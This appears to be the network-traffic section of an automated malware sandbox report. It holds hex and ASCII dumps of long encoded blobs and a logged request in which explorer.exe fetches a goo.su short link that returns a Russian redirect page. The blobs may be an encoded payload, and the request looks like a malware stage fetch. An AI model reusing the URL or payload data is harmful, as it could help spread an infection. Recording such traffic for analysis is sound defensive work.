00 62 00 47 00 74 00 64 00 34 00 39 00 45 00 77 00 37 00 44 00 34 00 4f 00 62 00 6d 00 35 00 45 00 63 00 72 00 45 00 34 00 34 00 33 00 6c 00
                                                                                                                                                                                                    Data Ascii: 4HUcnOhesF0fJFAhPj16zk6IZONhDcKybS8YlGWu71p/pk1cgeHTErU4vau3Kn3Bk3YOJogtNmdrYk0+HW5m1FwGpMMb1jcQJy1NFdftbGtd49Ew7D4Obm5EcrE443l
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC354INData Raw: 00 39 00 67 00 49 00 74 00 72 00 4c 00 50 00 50 00 37 00 58 00 36 00 52 00 52 00 7a 00 59 00 75 00 4f 00 59 00 75 00 33 00 66 00 58 00 74 00 58 00 61 00 32 00 47 00 6d 00 2f 00 48 00 66 00 70 00 34 00 2b 00 56 00 49 00 39 00 36 00 68 00 31 00 6f 00 4e 00 50 00 4a 00 42 00 49 00 70 00 35 00 79 00 63 00 39 00 6d 00 48 00 46 00 54 00 58 00 6d 00 64 00 6b 00 31 00 67 00 76 00 64 00 4a 00 30 00 71 00 65 00 49 00 6c 00 78 00 56 00 77 00 5a 00 63 00 70 00 69 00 4e 00 34 00 35 00 31 00 36 00 77 00 35 00 79 00 48 00 4f 00 74 00 72 00 77 00 78 00 58 00 73 00 63 00 79 00 72 00 6c 00 5a 00 2f 00 34 00 2f 00 41 00 4c 00 6d 00 4c 00 77 00 66 00 67 00 4a 00 6a 00 46 00 30 00 58 00 35 00 6d 00 73 00 36 00 63 00 34 00 38 00 4b 00 56 00 55 00 63 00 43 00 65 00 4c 00 71 00
                                                                                                                                                                                                    Data Ascii: 9gItrLPP7X6RRzYuOYu3fXtXa2Gm/Hfp4+VI96h1oNPJBIp5yc9mHFTXmdk1gvdJ0qeIlxVwZcpiN4516w5yHOtrwxXscyrlZ/4/ALmLwfgJjF0X5ms6c48KVUcCeLq
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC370INData Raw: 00 70 00 42 00 49 00 4a 00 55 00 6e 00 65 00 33 00 39 00 64 00 68 00 79 00 34 00 74 00 2f 00 6e 00 78 00 59 00 64 00 6d 00 61 00 4d 00 6f 00 33 00 79 00 43 00 65 00 30 00 31 00 69 00 70 00 2b 00 34 00 48 00 76 00 79 00 4a 00 74 00 32 00 76 00 69 00 67 00 78 00 4e 00 51 00 4c 00 77 00 72 00 33 00 33 00 51 00 6d 00 6a 00 59 00 45 00 31 00 43 00 67 00 53 00 46 00 4f 00 31 00 6d 00 70 00 61 00 2b 00 59 00 75 00 4e 00 4f 00 34 00 62 00 33 00 38 00 57 00 34 00 70 00 38 00 68 00 2f 00 38 00 7a 00 32 00 64 00 39 00 4f 00 47 00 50 00 69 00 7a 00 6f 00 77 00 77 00 6b 00 4e 00 45 00 73 00 33 00 37 00 57 00 56 00 69 00 52 00 52 00 37 00 41 00 37 00 2b 00 57 00 61 00 50 00 63 00 63 00 76 00 54 00 4c 00 57 00 4e 00 75 00 35 00 7a 00 64 00 4f 00 4f 00 48 00 2f 00 68 00
                                                                                                                                                                                                    Data Ascii: pBIJUne39dhy4t/nxYdmaMo3yCe01ip+4HvyJt2vigxNQLwr33QmjYE1CgSFO1mpa+YuNO4b38W4p8h/8z2d9OGPizowwkNEs37WViRR7A7+WaPccvTLWNu5zdOOH/h
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC386INData Raw: 00 37 00 46 00 56 00 56 00 57 00 74 00 55 00 77 00 79 00 32 00 54 00 4f 00 55 00 51 00 7a 00 78 00 54 00 38 00 78 00 7a 00 39 00 48 00 42 00 66 00 62 00 77 00 6e 00 57 00 2f 00 32 00 2f 00 6f 00 66 00 75 00 44 00 34 00 64 00 74 00 35 00 41 00 50 00 65 00 53 00 58 00 61 00 33 00 59 00 4a 00 53 00 4d 00 4a 00 56 00 53 00 71 00 52 00 64 00 6a 00 4c 00 4b 00 42 00 48 00 52 00 44 00 66 00 7a 00 41 00 72 00 49 00 34 00 35 00 43 00 70 00 30 00 62 00 4c 00 4a 00 79 00 5a 00 48 00 2b 00 31 00 30 00 4a 00 37 00 39 00 6b 00 30 00 76 00 4f 00 4c 00 64 00 78 00 4b 00 4a 00 44 00 42 00 4f 00 76 00 6b 00 56 00 31 00 53 00 63 00 52 00 35 00 4a 00 42 00 71 00 6f 00 79 00 45 00 4c 00 77 00 6b 00 4b 00 6c 00 72 00 53 00 6e 00 30 00 63 00 72 00 5a 00 38 00 2b 00 74 00 70 00
                                                                                                                                                                                                    Data Ascii: 7FVVWtUwy2TOUQzxT8xz9HBfbwnW/2/ofuD4dt5APeSXa3YJSMJVSqRdjLKBHRDfzArI45Cp0bLJyZH+10J79k0vOLdxKJDBOvkV1ScR5JBqoyELwkKlrSn0crZ8+tp
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC402INData Raw: 00 35 00 52 00 4c 00 69 00 6c 00 68 00 54 00 47 00 39 00 50 00 2b 00 4f 00 30 00 70 00 78 00 6c 00 65 00 66 00 6e 00 30 00 31 00 67 00 34 00 47 00 41 00 2b 00 6a 00 7a 00 45 00 45 00 6e 00 4c 00 72 00 66 00 44 00 2f 00 43 00 78 00 53 00 74 00 41 00 4a 00 35 00 38 00 50 00 33 00 58 00 30 00 78 00 45 00 79 00 46 00 4e 00 74 00 65 00 33 00 77 00 35 00 54 00 67 00 6d 00 49 00 4e 00 5a 00 6c 00 76 00 61 00 59 00 4e 00 30 00 63 00 41 00 30 00 6f 00 64 00 31 00 2f 00 46 00 47 00 4e 00 59 00 64 00 76 00 4e 00 59 00 78 00 78 00 74 00 73 00 52 00 41 00 4e 00 33 00 75 00 61 00 50 00 6b 00 38 00 55 00 59 00 6d 00 6f 00 68 00 62 00 63 00 64 00 4c 00 70 00 6c 00 49 00 55 00 39 00 6a 00 36 00 69 00 35 00 51 00 75 00 46 00 48 00 6f 00 6a 00 44 00 32 00 39 00 45 00 48 00
                                                                                                                                                                                                    Data Ascii: 5RLilhTG9P+O0pxlefn01g4GA+jzEEnLrfD/CxStAJ58P3X0xEyFNte3w5TgmINZlvaYN0cA0od1/FGNYdvNYxxtsRAN3uaPk8UYmohbcdLplIU9j6i5QuFHojD29EH
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC418INData Raw: 00 7a 00 38 00 6a 00 62 00 4d 00 45 00 53 00 56 00 32 00 6f 00 4d 00 49 00 64 00 57 00 57 00 7a 00 39 00 57 00 72 00 79 00 68 00 2b 00 79 00 72 00 56 00 7a 00 67 00 68 00 53 00 6d 00 34 00 39 00 43 00 51 00 70 00 62 00 4d 00 49 00 53 00 4e 00 58 00 39 00 71 00 6e 00 69 00 6c 00 67 00 34 00 6d 00 69 00 6b 00 37 00 34 00 62 00 79 00 52 00 4f 00 2f 00 48 00 54 00 6d 00 68 00 6f 00 46 00 50 00 53 00 4d 00 78 00 31 00 66 00 6f 00 59 00 58 00 6c 00 78 00 4b 00 48 00 69 00 79 00 67 00 62 00 7a 00 47 00 6b 00 69 00 30 00 54 00 72 00 45 00 4b 00 42 00 31 00 35 00 75 00 67 00 43 00 4a 00 59 00 75 00 30 00 6d 00 4c 00 48 00 67 00 74 00 6e 00 55 00 4c 00 69 00 55 00 2b 00 4a 00 56 00 30 00 46 00 61 00 5a 00 33 00 53 00 39 00 56 00 4e 00 72 00 69 00 51 00 6a 00 54 00
                                                                                                                                                                                                    Data Ascii: z8jbMESV2oMIdWWz9Wryh+yrVzghSm49CQpbMISNX9qnilg4mik74byRO/HTmhoFPSMx1foYXlxKHiygbzGki0TrEKB15ugCJYu0mLHgtnULiU+JV0FaZ3S9VNriQjT
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC434INData Raw: 00 68 00 30 00 41 00 2f 00 43 00 38 00 6c 00 64 00 52 00 74 00 6f 00 49 00 58 00 6c 00 67 00 2f 00 37 00 46 00 41 00 6d 00 6e 00 66 00 32 00 65 00 4c 00 6e 00 45 00 70 00 52 00 49 00 31 00 30 00 30 00 33 00 49 00 6a 00 43 00 43 00 35 00 59 00 5a 00 4d 00 74 00 35 00 63 00 76 00 36 00 34 00 52 00 65 00 64 00 46 00 30 00 4c 00 51 00 62 00 73 00 31 00 6b 00 41 00 69 00 7a 00 35 00 51 00 2f 00 30 00 51 00 62 00 4e 00 45 00 75 00 34 00 72 00 52 00 43 00 61 00 46 00 72 00 43 00 41 00 44 00 45 00 39 00 32 00 66 00 44 00 68 00 58 00 58 00 61 00 51 00 56 00 4d 00 31 00 2b 00 68 00 54 00 4b 00 51 00 47 00 4c 00 47 00 30 00 63 00 41 00 70 00 5a 00 35 00 4f 00 35 00 34 00 69 00 79 00 76 00 34 00 71 00 73 00 67 00 6a 00 79 00 6b 00 4a 00 76 00 46 00 4a 00 58 00 53 00
                                                                                                                                                                                                    Data Ascii: h0A/C8ldRtoIXlg/7FAmnf2eLnEpRI1003IjCC5YZMt5cv64RedF0LQbs1kAiz5Q/0QbNEu4rRCaFrCADE92fDhXXaQVM1+hTKQGLG0cApZ5O54iyv4qsgjykJvFJXS
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC450INData Raw: 00 6d 00 74 00 30 00 41 00 61 00 44 00 56 00 61 00 57 00 58 00 2b 00 2f 00 43 00 61 00 71 00 51 00 61 00 52 00 50 00 78 00 78 00 34 00 50 00 4b 00 4b 00 6a 00 77 00 45 00 56 00 64 00 70 00 58 00 51 00 68 00 4a 00 70 00 65 00 7a 00 7a 00 31 00 7a 00 75 00 6a 00 64 00 45 00 6f 00 67 00 55 00 4d 00 72 00 62 00 6d 00 33 00 7a 00 35 00 75 00 35 00 47 00 75 00 2b 00 65 00 50 00 52 00 57 00 7a 00 41 00 65 00 37 00 4a 00 66 00 58 00 6a 00 61 00 32 00 48 00 48 00 41 00 6c 00 58 00 4f 00 46 00 49 00 30 00 6d 00 49 00 2b 00 4d 00 58 00 57 00 75 00 6e 00 39 00 52 00 72 00 6a 00 6d 00 79 00 45 00 67 00 51 00 45 00 5a 00 74 00 7a 00 6d 00 31 00 73 00 63 00 73 00 75 00 64 00 57 00 39 00 62 00 49 00 45 00 57 00 7a 00 31 00 50 00 39 00 6f 00 62 00 64 00 59 00 68 00 31 00
                                                                                                                                                                                                    Data Ascii: mt0AaDVaWX+/CaqQaRPxx4PKKjwEVdpXQhJpezz1zujdEogUMrbm3z5u5Gu+ePRWzAe7JfXja2HHAlXOFI0mI+MXWun9RrjmyEgQEZtzm1scsudW9bIEWz1P9obdYh1
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC466INData Raw: 00 43 00 68 00 70 00 39 00 42 00 4a 00 36 00 72 00 6f 00 30 00 47 00 37 00 50 00 72 00 31 00 74 00 33 00 79 00 79 00 68 00 48 00 51 00 78 00 5a 00 52 00 6e 00 69 00 63 00 75 00 52 00 5a 00 67 00 56 00 50 00 47 00 78 00 6e 00 5a 00 52 00 58 00 32 00 77 00 51 00 44 00 76 00 2b 00 44 00 74 00 48 00 4f 00 39 00 31 00 64 00 30 00 66 00 4a 00 70 00 69 00 75 00 6e 00 66 00 69 00 55 00 73 00 6f 00 54 00 39 00 4e 00 78 00 2f 00 35 00 5a 00 6c 00 61 00 66 00 4d 00 57 00 4a 00 38 00 61 00 38 00 36 00 39 00 4b 00 50 00 68 00 61 00 54 00 45 00 75 00 76 00 58 00 67 00 2b 00 6c 00 4b 00 36 00 77 00 61 00 76 00 56 00 61 00 4b 00 6f 00 75 00 63 00 52 00 6a 00 72 00 71 00 61 00 4d 00 48 00 52 00 44 00 58 00 6a 00 64 00 34 00 59 00 37 00 4a 00 73 00 75 00 4e 00 4c 00 48 00
                                                                                                                                                                                                    Data Ascii: Chp9BJ6ro0G7Pr1t3yyhHQxZRnicuRZgVPGxnZRX2wQDv+DtHO91d0fJpiunfiUsoT9Nx/5ZlafMWJ8a869KPhaTEuvXg+lK6wavVaKoucRjrqaMHRDXjd4Y7JsuNLH
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC482INData Raw: 00 77 00 4c 00 35 00 35 00 6c 00 49 00 56 00 6d 00 55 00 54 00 6d 00 4e 00 73 00 76 00 56 00 71 00 78 00 52 00 52 00 52 00 47 00 37 00 45 00 62 00 77 00 57 00 69 00 32 00 4f 00 62 00 38 00 52 00 31 00 37 00 47 00 79 00 36 00 6c 00 65 00 7a 00 79 00 44 00 71 00 33 00 34 00 61 00 74 00 4a 00 4a 00 42 00 75 00 2b 00 55 00 64 00 50 00 36 00 37 00 44 00 47 00 56 00 55 00 47 00 6d 00 36 00 66 00 33 00 4e 00 50 00 37 00 6f 00 35 00 71 00 66 00 76 00 62 00 4b 00 50 00 47 00 45 00 55 00 79 00 4c 00 62 00 4e 00 56 00 77 00 6e 00 73 00 43 00 75 00 61 00 73 00 32 00 42 00 58 00 37 00 72 00 72 00 41 00 33 00 68 00 4c 00 74 00 55 00 6b 00 34 00 32 00 2f 00 65 00 53 00 7a 00 4a 00 31 00 59 00 4d 00 4d 00 77 00 58 00 52 00 74 00 4b 00 7a 00 69 00 70 00 51 00 71 00 62 00
                                                                                                                                                                                                    Data Ascii: wL55lIVmUTmNsvVqxRRRG7EbwWi2Ob8R17Gy6lezyDq34atJJBu+UdP67DGVUGm6f3NP7o5qfvbKPGEUyLbNVwnsCuas2BX7rrA3hLtUk42/eSzJ1YMMwXRtKzipQqb
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC498INData Raw: 00 70 00 74 00 4d 00 50 00 4b 00 4c 00 4d 00 56 00 31 00 59 00 51 00 30 00 4e 00 79 00 6d 00 58 00 36 00 4c 00 51 00 6e 00 45 00 41 00 57 00 35 00 58 00 50 00 6e 00 64 00 66 00 4d 00 73 00 54 00 62 00 46 00 34 00 33 00 71 00 38 00 52 00 42 00 42 00 44 00 34 00 6d 00 66 00 43 00 54 00 39 00 6b 00 7a 00 39 00 54 00 56 00 4b 00 30 00 4c 00 71 00 4d 00 45 00 51 00 33 00 4a 00 6b 00 42 00 7a 00 49 00 46 00 36 00 6f 00 55 00 43 00 7a 00 45 00 57 00 48 00 2b 00 38 00 4f 00 56 00 56 00 37 00 6f 00 70 00 33 00 59 00 69 00 71 00 4f 00 48 00 50 00 6b 00 64 00 48 00 71 00 53 00 55 00 64 00 2b 00 4a 00 4b 00 71 00 42 00 5a 00 7a 00 55 00 43 00 51 00 51 00 72 00 30 00 31 00 79 00 4b 00 75 00 5a 00 4d 00 44 00 36 00 53 00 2b 00 69 00 39 00 36 00 39 00 76 00 76 00 63 00
                                                                                                                                                                                                    Data Ascii: ptMPKLMV1YQ0NymX6LQnEAW5XPndfMsTbF43q8RBBD4mfCT9kz9TVK0LqMEQ3JkBzIF6oUCzEWH+8OVV7op3YiqOHPkdHqSUd+JKqBZzUCQQr01yKuZMD6S+i969vvc
                                                                                                                                                                                                    2022-01-14 03:59:13 UTC514INData Raw: 00 5a 00 35 00 50 00 33 00 55 00 55 00 32 00 6d 00 7a 00 63 00 31 00 7a 00 75 00 44 00 64 00 62 00 73 00 61 00 51 00 51 00 58 00 35 00 49 00 59 00 56 00 61 00 53 00 59 00 50 00 71 00 61 00 62 00 73 00 64 00 6e 00 32 00 78 00 30 00 50 00 44 00 55 00 32 00 5a 00 44 00 38 00 4f 00 75 00 77 00 65 00 6b 00 49 00 6d 00 53 00 57 00 68 00 43 00 74 00 74 00 48 00 67 00 49 00 57 00 4b 00 51 00 38 00 2b 00 63 00 51 00 58 00 34 00 43 00 74 00 58 00 33 00 4c 00 4f 00 66 00 51 00 73 00 79 00 6e 00 34 00 64 00 42 00 75 00 48 00 37 00 53 00 6d 00 6a 00 71 00 67 00 4c 00 73 00 77 00 4c 00 54 00 45 00 52 00 50 00 50 00 69 00 71 00 65 00 69 00 42 00 32 00 32 00 68 00 4f 00 48 00 45 00 66 00 2b 00 52 00 6a 00 2b 00 2b 00 4a 00 77 00 64 00 4d 00 55 00 48 00 68 00 6e 00 32 00
                                                                                                                                                                                                    Data Ascii: Z5P3UU2mzc1zuDdbsaQQX5IYVaSYPqabsdn2x0PDU2ZD8OuwekImSWhCttHgIWKQ8+cQX4CtX3LOfQsyn4dBuH7SmjqgLswLTERPPiqeiB22hOHEf+Rj++JwdMUHhn2


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                    2192.168.2.349858172.67.139.105443C:\Windows\explorer.exe
                                                                                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC526OUTGET /abhF HTTP/1.1
                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                    Host: goo.su
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC526INHTTP/1.1 200 OK
                                                                                                                                                                                                    Date: Fri, 14 Jan 2022 03:59:42 GMT
                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                    x-powered-by: PHP/7.2.21
                                                                                                                                                                                                    cache-control: private, must-revalidate
                                                                                                                                                                                                    pragma: no-cache
                                                                                                                                                                                                    expires: -1
                                                                                                                                                                                                    set-cookie: XSRF-TOKEN=eyJpdiI6IkJ2NGhxc1pwR2pKcnJNem5qMEo0QXc9PSIsInZhbHVlIjoiaU8zS3htbkhDYzVOVlJmR0xxazVMVkZRS3d3ZWdYR2dzdFZPRXpEbGZuRXBCZGl2NWM0WEpGQW1FdFFtWW9lMSIsIm1hYyI6ImU1NTJiNzZkNDFkMTU1MGI1YWZkNjc0NTA5ZTBjZWQ3NWNkZmQyZDg0YTE2ZjIxZjQwYTBmMzZjMGNjMDNjN2YifQ%3D%3D; expires=Fri, 14-Jan-2022 22:39:42 GMT; Max-Age=67200; path=/
                                                                                                                                                                                                    set-cookie: goosu_session=eyJpdiI6IlBDS3dRY2wzWEZDXC9tUzlXeVBCdUN3PT0iLCJ2YWx1ZSI6InR1MnNkYnpwWjZmRE54Q3FtYzVwOWtybmt4M0orNkE0cDM5QWNMaEJORWtqTzZpc2k0eSs0NUorZW5iUlEzUVMiLCJtYWMiOiIwMTcyMzU2OTU5OTdlNDc1YzVkY2MxZDViZjkwMjZiZTg4OTgzZDUxYWM4ZjRiMjY0NTcxZjgzZGI5MjY3MGE0In0%3D; expires=Fri, 14-Jan-2022 22:39:42 GMT; Max-Age=67200; path=/; httponly
                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QA5cZVCVi5uOUC%2FxzuRaIOv40nYFUqzqTo2%2Br3L%2F0tyQ1U4vvUfNyIpTe7hnE05vLY91evQV3c3%2FC3hMpxfTlGCSOpNfmMfvVyEJoKyR%2FfrIDxg75DeUYj8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC528INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 36 63 64 33 66 34 30 30 66 39 66 34 30 30 38 64 2d 4c 48 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 2c 20 68 33 2d 32 39 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 2c 20 68 33 2d 32 38 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 2c 20 68 33 2d 32 37 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 6cd3f400f9f4008d-LHRalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC528INData Raw: 32 31 32 65 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 72 75 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 3c 74 69 74 6c 65 3e d0 9f d1 80 d0 be d0 b8 d1 81 d1 85 d0 be d0 b4 d0 b8 d1 82 20 d0 bf d0 b5 d1 80 d0 b5 d0 bd d0 b0 d0 bf d1 80 d0 b0 d0 b2 d0 bb d0 b5 d0 bd d0 b8 d0 b5 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 68
                                                                                                                                                                                                    Data Ascii: 212e<!doctype html><html lang="ru"><head><meta charset="utf-8"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="robots" content="noindex"><title> ...</title><link h
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC529INData Raw: 2d 62 6f 74 74 6f 6d 3a 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 62 6f 72 64 65 72 65 64 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 33 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 73 68 61 64 6f 77 3a 20 30 70 78 20 31 70
                                                                                                                                                                                                    Data Ascii: -bottom: 30px; } .bordered { border: 1px solid #eee; padding: 10px; } h3 { font-size: 24px; text-align: center; font-weight: 400; text-shadow: 0px 1p
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC530INData Raw: 20 20 20 20 20 20 20 20 20 20 61 73 79 6e 63 3a 20 74 72 75 65 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 20 3d 20 64 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2e 74 79 70 65 20 3d 20 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73
                                                                                                                                                                                                    Data Ascii: async: true }); }); t = d.getElementsByTagName("script")[0]; s = d.createElement("script"); s.type = "text/javascript"; s
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC532INData Raw: 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 20 3d 20 64 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2e 74 79 70 65 20 3d 20 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2e 73 72 63 20 3d 20 22 2f 2f 61 6e 2e 79 61 6e 64 65 78 2e 72 75 2f 73 79 73 74 65 6d 2f 63 6f 6e 74 65 78 74 2e 6a 73 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2e 61 73 79 6e 63 20 3d 20 74 72 75 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2e
                                                                                                                                                                                                    Data Ascii: yTagName("script")[0]; s = d.createElement("script"); s.type = "text/javascript"; s.src = "//an.yandex.ru/system/context.js"; s.async = true; t.parentNode.
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC533INData Raw: 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 71 38 69 2f 58 2b 39 36 35 44 7a 4f 30 72 54 37 61 62 4b 34 31 4a 53 74 51 49 41 71 56 67 52 56 7a 70 62 7a 6f 35 73 6d 58 4b 70 34 59 66 52 76 48 2b 38 61 62 74 54 45 31 50 69 36 6a 69 7a 6f 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6a 51 75 65 72 79 20 7c 7c 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 27 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 64 6f 63 73 2f 34 2e 33 2f 61 73 73 65 74 73 2f 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2d 73 6c 69 6d 2e 6d 69 6e 2e 6a 73 22 3e 3c 5c 2f 73 63 72 69 70 74 3e 27 29 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f
                                                                                                                                                                                                    Data Ascii: grity="sha384-q8i/X+965DzO0rT7abK41JStQIAqVgRVzpbzo5smXKp4YfRvH+8abtTE1Pi6jizo" crossorigin="anonymous"></script><script>window.jQuery || document.write('<script src="/docs/4.3/assets/js/vendor/jquery-slim.min.js"><\/script>')</script><script src="/js/
                                                                                                                                                                                                    2022-01-14 03:59:42 UTC534INData Raw: 76 65 69 6e 74 65 72 6e 65 74 2e 72 75 2f 63 6c 69 63 6b 22 20 27 2b 0a 20 20 20 20 20 20 20 20 20 20 20 20 27 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 63 6f 75 6e 74 65 72 2e 79 61 64 72 6f 2e 72 75 2f 68 69 74 3f 74 34 34 2e 31 31 3b 72 27 2b 0a 20 20 20 20 20 20 20 20 20 20 20 20 65 73 63 61 70 65 28 64 6f 63 75 6d 65 6e 74 2e 72 65 66 65 72 72 65 72 29 2b 28 28 74 79 70 65 6f 66 28 73 63 72 65 65 6e 29 3d 3d 27 75 6e 64 65 66 69 6e 65 64 27 29 3f 27 27 3a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3b 73 27 2b 73 63 72 65 65 6e 2e 77 69 64 74 68 2b 27 2a 27 2b 73 63 72 65 65 6e 2e 68 65 69 67 68 74 2b 27 2a 27 2b 28 73 63 72 65 65 6e 2e 63 6f 6c 6f 72 44 65 70 74 68 3f 0a 20 20 20 20 20 20 20 20 20
                                                                                                                                                                                                    Data Ascii: veinternet.ru/click" '+ 'target="_blank"><img src="//counter.yadro.ru/hit?t44.11;r'+ escape(document.referrer)+((typeof(screen)=='undefined')?'': ';s'+screen.width+'*'+screen.height+'*'+(screen.colorDepth?
